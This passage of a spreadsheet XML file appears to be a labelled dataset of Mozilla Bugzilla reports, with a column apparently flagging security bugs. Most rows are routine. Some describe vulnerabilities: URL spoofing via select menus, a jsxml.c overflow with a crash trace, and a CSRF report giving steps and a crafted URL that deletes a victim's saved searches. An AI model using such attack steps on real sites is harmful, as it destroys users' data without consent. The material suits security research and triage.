12 	xul.dll 	nsDocument::EnumerateSubDocuments(bool (*)(nsIDocument*, void*), void*) 	dom/base/nsDocument.cpp:8845
13 	xul.dll 	FlushLayoutRecursive(nsIDocument*, void*) 	layout/base/nsPresShell.cpp:3653
14 	xul.dll 	PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) 	layout/base/nsPresShell.cpp:3685
15 	xul.dll 	PresShell::ProcessSynthMouseMoveEvent(bool) 	layout/base/nsPresShell.cpp:5627
16 	xul.dll 	nsCOMPtr_base::~nsCOMPtr_base() 	obj-firefox/dist/include/nsCOMPtr.h:295
17 	xul.dll 	PresShell::nsSynthMouseMoveEvent::WillRefresh(mozilla::TimeStamp) 	layout/base/nsPresShell.h:667
18 	xul.dll 	mozilla::IMEStateManager::SetInputContext(nsIWidget*, mozilla::widget::InputContext const&amp;, mozilla::widget::InputContextAction const&amp;) 	dom/events/IMEStateManager.cpp:1085
19 	xul.dll 	mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp:508
this crash signature is regressing since firefox 49 and seems to occur in the code of the changes from bug 881832.
it's currently the #35 crasher on 449.0b1 making up 0.27% of all crashes.</t>
        </is>
      </c>
      <c r="X2321" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2322">
      <c r="A2322" t="n">
        <v>519980</v>
      </c>
      <c r="B2322" t="inlineStr">
        <is>
          <t>2009-10-01 08:17:26 -0700</t>
        </is>
      </c>
      <c r="C2322" t="inlineStr">
        <is>
          <t>Uniform and better range checking for object size overflow</t>
        </is>
      </c>
      <c r="D2322" t="inlineStr">
        <is>
          <t>2009-10-14 14:36:53 -0700</t>
        </is>
      </c>
      <c r="E2322" t="n">
        <v>1</v>
      </c>
      <c r="F2322" t="n">
        <v>1</v>
      </c>
      <c r="G2322" t="n">
        <v>6</v>
      </c>
      <c r="H2322" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2322" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J2322" t="inlineStr">
        <is>
          <t>Garbage Collection (mmGC)</t>
        </is>
      </c>
      <c r="K2322" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2322" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2322" t="inlineStr"/>
      <c r="Q2322" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2322" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2322" t="inlineStr">
        <is>
          <t>flash10.1</t>
        </is>
      </c>
      <c r="T2322" t="n">
        <v>1</v>
      </c>
      <c r="U2322" t="n">
        <v>0</v>
      </c>
      <c r="V2322" t="n">
        <v>5</v>
      </c>
      <c r="W2322" t="inlineStr">
        <is>
          <t>Created attachment 404045
Patch
Joining several patches from other bugs here (bug #486770, bug #517679) plus one relevant fix to allocation code in GCGlobalNew.cpp.
Also contains one small drive-by fix: methods that have APIs like calloc() take arguments in the same order as calloc() (first count, then element size).</t>
        </is>
      </c>
      <c r="X2322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2323">
      <c r="A2323" t="n">
        <v>318041</v>
      </c>
      <c r="B2323" t="inlineStr">
        <is>
          <t>2005-11-28 13:23:59 -0800</t>
        </is>
      </c>
      <c r="C2323" t="inlineStr">
        <is>
          <t>disable-xul doesn't build because minimo uses toolkit</t>
        </is>
      </c>
      <c r="D2323" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E2323" t="n">
        <v>1</v>
      </c>
      <c r="F2323" t="n">
        <v>1</v>
      </c>
      <c r="G2323" t="n">
        <v>7</v>
      </c>
      <c r="H2323" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2323" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2323" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2323" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2323" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2323" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2323" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2323" t="inlineStr"/>
      <c r="Q2323" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2323" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2323" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2323" t="n">
        <v>1</v>
      </c>
      <c r="U2323" t="n">
        <v>0</v>
      </c>
      <c r="V2323" t="n">
        <v>43</v>
      </c>
      <c r="W2323" t="inlineStr">
        <is>
          <t>I've tried to build the minimo source code with the ac_add_option --disable-xul set. Unfortunately, an error occurs when it is compiling the nsAutoCompleteController. It makes a request to nsITreeView.h, that is generated by the .idl inside layout/xul/base/src/tree/src.
We are able to compile this and partly solve the problem, 'cause after this the error is compiling nsTreeBodyFrame, that we can't just compile (there are another dependences).
My mozconfig is:
mk_add_options MOZ_CO_PROJECT=osso-browser-mozilla-engine
ac_add_options --enable-application=minimo
ac_add_options --prefix=/usr/
# use GTK+-2 widget set with XFT font rendering
ac_add_options --enable-default-toolkit=gtk2
ac_add_options --enable-xft
ac_add_options --disable-freetype2
ac_add_options --disable-xul
ac_add_options --enable-optimize=-Os
ac_add_options --enable-strip
ac_add_options --disable-debug
ac_add_options --enable-reorder
ac_add_options --enable-elf-dynstr-gc
# enable static build
#ac_add_options --disable-shared
#ac_add_options --enable-static
# remove link dependency on libstdc++.so
LIBS=-lsupc++
CXX=gcc
My code was downloaded november 25, 2005.</t>
        </is>
      </c>
      <c r="X2323" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2324">
      <c r="A2324" t="n">
        <v>37759</v>
      </c>
      <c r="B2324" t="inlineStr">
        <is>
          <t>2000-05-01 13:13:03 -0700</t>
        </is>
      </c>
      <c r="C2324" t="inlineStr">
        <is>
          <t>(win32) menulist in a &lt;window align="vertical"&gt; has 0 height.</t>
        </is>
      </c>
      <c r="D2324" t="inlineStr">
        <is>
          <t>2000-05-17 13:45:28 -0700</t>
        </is>
      </c>
      <c r="E2324" t="n">
        <v>1</v>
      </c>
      <c r="F2324" t="n">
        <v>1</v>
      </c>
      <c r="G2324" t="n">
        <v>3</v>
      </c>
      <c r="H2324" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2324" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2324" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2324" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2324" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2324" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2324" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2324" t="inlineStr">
        <is>
          <t>[dogfood+]</t>
        </is>
      </c>
      <c r="Q2324" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2324" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2324" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T2324" t="n">
        <v>1</v>
      </c>
      <c r="U2324" t="n">
        <v>0</v>
      </c>
      <c r="V2324" t="n">
        <v>21</v>
      </c>
      <c r="W2324" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; m16) Gecko/20000501
BuildID:    2000050111
Anytime you try to open anything you cannot pick it, it is simply a thin black
line.
Reproducible: Always
Steps to Reproduce:
1.file-open_weblocation
2.file-open
3.
Expected Results:  given you a choice....browser, composer</t>
        </is>
      </c>
      <c r="X2324" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2325">
      <c r="A2325" t="n">
        <v>868327</v>
      </c>
      <c r="B2325" t="inlineStr">
        <is>
          <t>2013-05-03 01:28:10 -0700</t>
        </is>
      </c>
      <c r="C2325" t="inlineStr">
        <is>
          <t>Mozilla Firefox Navigation away from a page with an active &lt;select&gt; dropdown menu can be used for URL/SSL spoofing and ClickJacking Attacks</t>
        </is>
      </c>
      <c r="D2325" t="inlineStr">
        <is>
          <t>2024-06-02 18:29:41 -0700</t>
        </is>
      </c>
      <c r="E2325" t="n">
        <v>1</v>
      </c>
      <c r="F2325" t="n">
        <v>1</v>
      </c>
      <c r="G2325" t="n">
        <v>3</v>
      </c>
      <c r="H2325" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2325" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2325" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2325" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L2325" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2325" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2325" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2325" t="inlineStr">
        <is>
          <t>[adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q2325" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2325" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2325" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2325" t="n">
        <v>1</v>
      </c>
      <c r="U2325" t="n">
        <v>0</v>
      </c>
      <c r="V2325" t="n">
        <v>19</v>
      </c>
      <c r="W2325" t="inlineStr">
        <is>
          <t>Created attachment 745055
SSL-URL-SPOOF-AND-GEOLOCATION-CLICKJACKING.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Build ID: 20130409194949
Steps to reproduce:
SELECT / OPTION elements  may contain html contents and surpass the location bar and the box geolocation (for exemple), it is possible with these elements to make multiple attacks like SSL URL Spoofing and Clickjacking
Actual results:
The Location Bar and the SSL indicia are spoofed and the geolocation authorization can be bypassed.
Expected results:
Select/Option element surpass all other element ( location bar / geolocation box ...)</t>
        </is>
      </c>
      <c r="X2325" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2326">
      <c r="A2326" t="n">
        <v>319872</v>
      </c>
      <c r="B2326" t="inlineStr">
        <is>
          <t>2005-12-11 07:46:11 -0800</t>
        </is>
      </c>
      <c r="C2326" t="inlineStr">
        <is>
          <t>CVE-2006-0297 probably an integer overflow in jsxml.c</t>
        </is>
      </c>
      <c r="D2326" t="inlineStr">
        <is>
          <t>2006-04-18 19:56:52 -0700</t>
        </is>
      </c>
      <c r="E2326" t="n">
        <v>1</v>
      </c>
      <c r="F2326" t="n">
        <v>1</v>
      </c>
      <c r="G2326" t="n">
        <v>3</v>
      </c>
      <c r="H2326" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2326" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2326" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2326" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2326" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2326" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2326" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2326" t="inlineStr">
        <is>
          <t>[sg:investigate] critical? [rft-dl]</t>
        </is>
      </c>
      <c r="Q2326" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2326" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2326" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2326" t="n">
        <v>1</v>
      </c>
      <c r="U2326" t="n">
        <v>0</v>
      </c>
      <c r="V2326" t="n">
        <v>35</v>
      </c>
      <c r="W2326" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
in jsxml.c:2351 EscapeAttributeValue
    if (c == '"')
            newlength += 5;
        else if (c == '&lt;')
            newlength += 3;
        else if (c == '&amp;' || c == '\n' || c == '\r' || c == '\t')
            newlength += 4;
this seems somewhat suspicous, because of "int too big" problem (probably
after multiplication with sizeof(jschar) ).
some empirical evidence suggests SEGV in free() after hitting this code,
though the exact codepath is not determined yet.
exploitability will be determined later.
debug builds die from abort(), but 1.5 release crashes in free.
testcase to follow.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1220606272 (LWP 16742)]
0xb753e339 in free () from /lib/tls/libc.so.6
#0  0xb753e339 in free () from /lib/tls/libc.so.6
#1  0xb7fc2ea9 in js_ReportCompileErrorNumberUC ()
   from /opt/firefox15/libmozjs.so
#2  0xb7fc2ef7 in js_FinishStringBuffer () from /opt/firefox15/libmozjs.so
#3  0xb7fd342d in js_IsXMLName () from /opt/firefox15/libmozjs.so
#4  0xb7fd3954 in js_IsXMLName () from /opt/firefox15/libmozjs.so
#5  0xb7fd9b62 in js_IsXMLName () from /opt/firefox15/libmozjs.so
#6  0xb7f989b9 in js_Invoke () from /opt/firefox15/libmozjs.so
#7  0xb7fa1717 in js_Interpret () from /opt/firefox15/libmozjs.so
#8  0xb7f99011 in js_Execute () from /opt/firefox15/libmozjs.so
#9  0xb7f78a28 in JS_EvaluateUCScriptForPrincipals ()
   from /opt/firefox15/libmozjs.so
(gdb) x/i $eip
0xb753e339 &lt;free+73&gt;:   mov    0x4(%ecx),%eax
(gdb) p/x $eax
$1 = 0xb76037e4
(gdb) p/x $ecx
$2 = 0xfffffff9
Reproducible: Always
Steps to Reproduce:
testcase
Actual Results:  
crash in free()
Expected Results:  
crash free</t>
        </is>
      </c>
      <c r="X2326" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2327">
      <c r="A2327" t="n">
        <v>1523732</v>
      </c>
      <c r="B2327" t="inlineStr">
        <is>
          <t>2019-01-29 12:01:04 -0800</t>
        </is>
      </c>
      <c r="C2327" t="inlineStr">
        <is>
          <t>Lockbox desktop metrics.md</t>
        </is>
      </c>
      <c r="D2327" t="inlineStr">
        <is>
          <t>2019-02-22 13:47:15 -0800</t>
        </is>
      </c>
      <c r="E2327" t="n">
        <v>1</v>
      </c>
      <c r="F2327" t="n">
        <v>1</v>
      </c>
      <c r="G2327" t="n">
        <v>5</v>
      </c>
      <c r="H2327" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2327" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J2327" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K2327" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2327" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2327" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2327" t="inlineStr"/>
      <c r="Q2327" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2327" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2327" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2327" t="n">
        <v>1</v>
      </c>
      <c r="U2327" t="n">
        <v>0</v>
      </c>
      <c r="V2327" t="n">
        <v>2</v>
      </c>
      <c r="W2327" t="inlineStr">
        <is>
          <t>We need to update the metrics.md based on the most recent designs: https://github.com/mozilla-lockbox/lockbox-addon/blob/master/docs/metrics.md
This enables the Lockbox engineering team to implement the events.</t>
        </is>
      </c>
      <c r="X2327" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2328">
      <c r="A2328" t="n">
        <v>466748</v>
      </c>
      <c r="B2328" t="inlineStr">
        <is>
          <t>2008-11-25 16:57:46 -0800</t>
        </is>
      </c>
      <c r="C2328" t="inlineStr">
        <is>
          <t>[SECURITY] Shared/saved searches can be deleted without user confirmation using predictable URL</t>
        </is>
      </c>
      <c r="D2328" t="inlineStr">
        <is>
          <t>2009-02-17 07:40:54 -0800</t>
        </is>
      </c>
      <c r="E2328" t="n">
        <v>1</v>
      </c>
      <c r="F2328" t="n">
        <v>1</v>
      </c>
      <c r="G2328" t="n">
        <v>4</v>
      </c>
      <c r="H2328" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2328" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2328" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K2328" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L2328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2328" t="inlineStr"/>
      <c r="Q2328" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2328" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2328" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2328" t="n">
        <v>1</v>
      </c>
      <c r="U2328" t="n">
        <v>0</v>
      </c>
      <c r="V2328" t="n">
        <v>27</v>
      </c>
      <c r="W2328" t="inlineStr">
        <is>
          <t>I added this to bug 466692, as at the time it seemed yet another instance of the same thing (missing token check / user confirmation for a privileged action), but it seems the cause is in fact rather different.
Steps to reproduce:
1. Find a shared query from the list on your user preferences.
2. Copy-paste the "Run" link
3. edit this to change remaction=run to remaction=forget, and to remove the sharer_id=....
4. Trick the user who created the query into loading this url
Steps 1 and 2 can be skipped, and this attack used on non-shared queries if you can predict the name of them. For example, users may have a legacy query named "My bugs" that can be deleted with:
https://[munged-to-prevent-accidents]/buglist.cgi?cmdtype=dorem&amp;remaction=forget&amp;namedcmd=My%20bugs</t>
        </is>
      </c>
      <c r="X2328" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2329">
      <c r="A2329" t="n">
        <v>585815</v>
      </c>
      <c r="B2329" t="inlineStr">
        <is>
          <t>2010-08-09 17:05:39 -0700</t>
        </is>
      </c>
      <c r="C2329" t="inlineStr">
        <is>
          <t>Possible unfixed nsTreeSelection dangling pointer issues from bug 571106 (ZDI-CAN-903)</t>
        </is>
      </c>
      <c r="D2329" t="inlineStr">
        <is>
          <t>2013-05-18 18:14:45 -0700</t>
        </is>
      </c>
      <c r="E2329" t="n">
        <v>1</v>
      </c>
      <c r="F2329" t="n">
        <v>1</v>
      </c>
      <c r="G2329" t="n">
        <v>3</v>
      </c>
      <c r="H2329" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2329" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2329" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2329" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2329" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2329" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q2329" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2329" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2329" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2329" t="n">
        <v>1</v>
      </c>
      <c r="U2329" t="n">
        <v>0</v>
      </c>
      <c r="V2329" t="n">
        <v>22</v>
      </c>
      <c r="W2329" t="inlineStr">
        <is>
          <t>ZDI just notified us that the researcher who reported ZDI-10-131 (Mozilla Firefox nsTreeSelection Dangling Pointer Remote Code Execution Vulnerability), also known as bug 571106, has reported that the vulnerability is still an issue even though a patch was released.
Need to make sure that the entirety of the researcher's original report has been fixed and not just what the PoC may be showing. I will follow-up with ZDI to see if there is a better testcase for the issue.
Since I accidentally submitted bug 571106, comment #0 with extra blank lines, I will repaste the original report in the next comment.</t>
        </is>
      </c>
      <c r="X2329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2330">
      <c r="A2330" t="n">
        <v>2706</v>
      </c>
      <c r="B2330" t="inlineStr">
        <is>
          <t>1999-01-27 11:57:51 -0800</t>
        </is>
      </c>
      <c r="C2330" t="inlineStr">
        <is>
          <t>Have MoveToBugzilla Button update bug to Closed/Won't Fix</t>
        </is>
      </c>
      <c r="D2330" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:19 -0800</t>
        </is>
      </c>
      <c r="E2330" t="n">
        <v>1</v>
      </c>
      <c r="F2330" t="n">
        <v>1</v>
      </c>
      <c r="G2330" t="n">
        <v>4</v>
      </c>
      <c r="H2330" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2330" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2330" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2330" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2330" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2330" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N2330" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2330" t="inlineStr"/>
      <c r="Q2330" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2330" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2330" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T2330" t="n">
        <v>1</v>
      </c>
      <c r="U2330" t="n">
        <v>0</v>
      </c>
      <c r="V2330" t="n">
        <v>4</v>
      </c>
      <c r="W2330" t="inlineStr">
        <is>
          <t>Currently this button in Bugsplat changes original bug to Closed/Invalid.
Enginneer are asking if this can be changed to set bug to Closed/Won't Fix.
Thus, the SusTeam can query to review these bugs for consideration to fix in
future maintenance releases.  Also, 5.0 engineers indicate that the bug is
really Won't Fix for this code base.
Is this a hassle to change?</t>
        </is>
      </c>
      <c r="X2330" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2331">
      <c r="A2331" t="n">
        <v>1316077</v>
      </c>
      <c r="B2331" t="inlineStr">
        <is>
          <t>2016-11-08 10:25:44 -0800</t>
        </is>
      </c>
      <c r="C2331" t="inlineStr">
        <is>
          <t>Support buildbot-bridge in gecko tree config</t>
        </is>
      </c>
      <c r="D2331" t="inlineStr">
        <is>
          <t>2019-02-08 13:19:49 -0800</t>
        </is>
      </c>
      <c r="E2331" t="n">
        <v>1</v>
      </c>
      <c r="F2331" t="n">
        <v>1</v>
      </c>
      <c r="G2331" t="n">
        <v>5</v>
      </c>
      <c r="H2331" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2331" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J2331" t="inlineStr">
        <is>
          <t>Services</t>
        </is>
      </c>
      <c r="K2331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2331" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2331" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2331" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2331" t="inlineStr"/>
      <c r="Q2331" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2331" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2331" t="n">
        <v>1</v>
      </c>
      <c r="U2331" t="n">
        <v>0</v>
      </c>
      <c r="V2331" t="n">
        <v>25</v>
      </c>
      <c r="W2331" t="inlineStr">
        <is>
          <t>Add buildbot-bridge as a worker in the in tree configuration.</t>
        </is>
      </c>
      <c r="X2331" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2332">
      <c r="A2332" t="n">
        <v>1553734</v>
      </c>
      <c r="B2332" t="inlineStr">
        <is>
          <t>2019-05-22 23:46:18 -0700</t>
        </is>
      </c>
      <c r="C2332" t="inlineStr">
        <is>
          <t>Quickly copy full commit hash</t>
        </is>
      </c>
      <c r="D2332" t="inlineStr">
        <is>
          <t>2019-08-07 01:44:15 -0700</t>
        </is>
      </c>
      <c r="E2332" t="n">
        <v>1</v>
      </c>
      <c r="F2332" t="n">
        <v>1</v>
      </c>
      <c r="G2332" t="n">
        <v>7</v>
      </c>
      <c r="H2332" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2332" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2332" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K2332" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2332" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2332" t="inlineStr"/>
      <c r="Q2332" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2332" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2332" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2332" t="n">
        <v>1</v>
      </c>
      <c r="U2332" t="n">
        <v>0</v>
      </c>
      <c r="V2332" t="n">
        <v>5</v>
      </c>
      <c r="W2332" t="inlineStr">
        <is>
          <t>Created attachment 9066957
copy-paste-button.png
As a perf sheriff using Treeherder, I often require to get the full commit hashes, to paste in the tools I'm using.
ATM, I use an extra step to get it: I click on the hyperlink highlighted in the attachment, then copy the full hash from the URL.
Ideally, we should prefix the short hash hyperlink with a small, icon-like button which quickly copies the full hash when clicked.</t>
        </is>
      </c>
      <c r="X2332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2333">
      <c r="A2333" t="n">
        <v>1187395</v>
      </c>
      <c r="B2333" t="inlineStr">
        <is>
          <t>2015-07-24 10:32:32 -0700</t>
        </is>
      </c>
      <c r="C2333" t="inlineStr">
        <is>
          <t>HTTP 400 errors when mozilla-taskcluster POSTs to the jobs endpoint on treeherder staging</t>
        </is>
      </c>
      <c r="D2333" t="inlineStr">
        <is>
          <t>2015-08-05 04:39:14 -0700</t>
        </is>
      </c>
      <c r="E2333" t="n">
        <v>1</v>
      </c>
      <c r="F2333" t="n">
        <v>1</v>
      </c>
      <c r="G2333" t="n">
        <v>7</v>
      </c>
      <c r="H2333" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2333" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2333" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K2333" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
